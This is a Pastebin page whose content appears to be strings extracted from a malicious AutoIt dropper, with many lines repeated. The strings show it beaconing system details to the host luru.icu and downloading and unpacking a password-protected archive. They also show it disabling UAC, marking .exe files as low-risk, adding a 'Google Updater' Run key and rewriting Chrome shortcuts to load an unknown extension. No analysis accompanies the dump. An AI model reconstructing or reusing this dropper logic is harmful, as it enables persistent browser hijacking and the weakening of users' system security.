Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- @CPUArch
- $mJaxqjYsN.setRequestHeader('OS',@OSVersion)
- $mJaxqjYsN.setRequestHeader('Installed',$VpplJjYpXez)
- $mJaxqjYsN.GetResponseHeader('unzip')
- @UserName
- @SW_MAXIMIZE
- @DesktopDir
- StringTrimLeft
- StringSplit
- WinGetTitle
- RegRead
- ProcessList
- StringInStr
- StringLower
- Sleep
- Ping
- @AutoItPID
- @ScriptName
- [ACTIVE]
- Start|cmd.exe|Program Manager
- |
- updater|video|play|app
- |
- No
- www.google.com
- HKCU\Software\Unzip
- Installed
- Yes
- No
- RegWrite
- HKCU\Software\Unzip
- Installed
- REG_SZ
- Yes
- ObjCreate('winhttp.winhttprequest.5.1')
- $mJaxqjYsN.Open('HEAD', 'http://luru.icu/app/login.php'), False)
- $mJaxqjYsN.setRequestHeader('User-Agent','Unzip')
- $mJaxqjYsN.setRequestHeader('Window',$UAQsi)
- $mJaxqjYsN.setRequestHeader('ScriptName',@ScriptName)
- $mJaxqjYsN.setRequestHeader('CPU',@CPUArch)
- $mJaxqjYsN.Send()
- $mJaxqjYsN.Status
- $mJaxqjYsN.GetResponseHeader('zip')
- @AppDataDir
- \
- DirCreate
- FileExists
- InetGet
- \
- 7za.exe
- \
- 7za.exe
- \
- files.7z
- @SW_HIDE
- RunWait
- \
- 7za.exe e files.7z -aoa -pKEQZmgbrmDnTpa2b4DHVMX
- @ScriptFullPath
- FileCopy
- \
- app.exe
- ProcessWaitClose
- ProcessClose
- WinClose
- WinGetHandle
- [REGEXPTITLE:(?i)(.*Chrome.*)]
- chrome.exe
- chrome.exe
- RegWrite
- HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
- LowRiskFileTypes
- REG_SZ
- .exe
- HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Associations
- LowRiskFileTypes
- REG_SZ
- .exe
- HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
- EnableLUA
- REG_DWORD
- HKLM\Software\Microsoft\Windows\CurrentVersion\Run
- Google Updater
- REG_SZ
- \
- app.exe
- ShellExecute
- chrome.exe
- --enable-automation --restore-last-session --disable-infobars --load-extension=
- @AppDataCommonDir
- @ProgramsCommonDir
- @DesktopCommonDir
- \Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar
- \Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar
- *.lnk
- FileClose
- SetError
- FileFindFirstFile
- FileFindNextFile
- StringRegExpReplace
- StringRegExp
- |
- [\\/]+$
- \
- [\\/:><\|]|(?s)^\s*$
- \
- FileGetShortcut
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- FileCreateShortcut
- --enable-automation --disable-infobars --load-extension=
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- *.lnk
- FileClose
- SetError
- FileFindFirstFile
- FileFindNextFile
- StringRegExpReplace
- StringRegExp
- |
- [\\/]+$
- \
- [\\/:><\|]|(?s)^\s*$
- \
- FileGetShortcut
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- *.lnk
- FileClose
- SetError
- FileFindFirstFile
- FileFindNextFile
- StringRegExpReplace
- StringRegExp
- |
- [\\/]+$
- \
- *.lnk
- FileClose
- SetError
- FileFindFirstFile
- FileFindNextFile
- StringRegExpReplace
- StringRegExp
- |
- [\\/]+$
- \
- [\\/:><\|]|(?s)^\s*$
- \
- FileGetShortcut
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- FileCreateShortcut
- --enable-automation --disable-infobars --load-extension=
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- *.lnk
- FileClose
- SetError
- FileFindFirstFile
- FileFindNextFile
- StringRegExpReplace
- StringRegExp
- |
- [\\/]+$
- \
- [\\/:><\|]|(?s)^\s*$
- \
- FileGetShortcut
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- FileCreateShortcut
- --enable-automation --disable-infobars --load-extension=
- \
- FileGetShortcut
- StringLeft
- ^\h*((?:\\\\\?\\)*(\\\\[^\?\/\\]+|[A-Za-z]:)?(.*[\/\\]\h*)?((?:[^\.\/\\]|(?(?=\.[^\/\\]*\.)\.))*)?([^\/\\]*))$
- \h*[\/\\]+\h*
- \\
- chrome
- Run
- ProcessExists
- X64
- update-x64.exe
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
- \
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement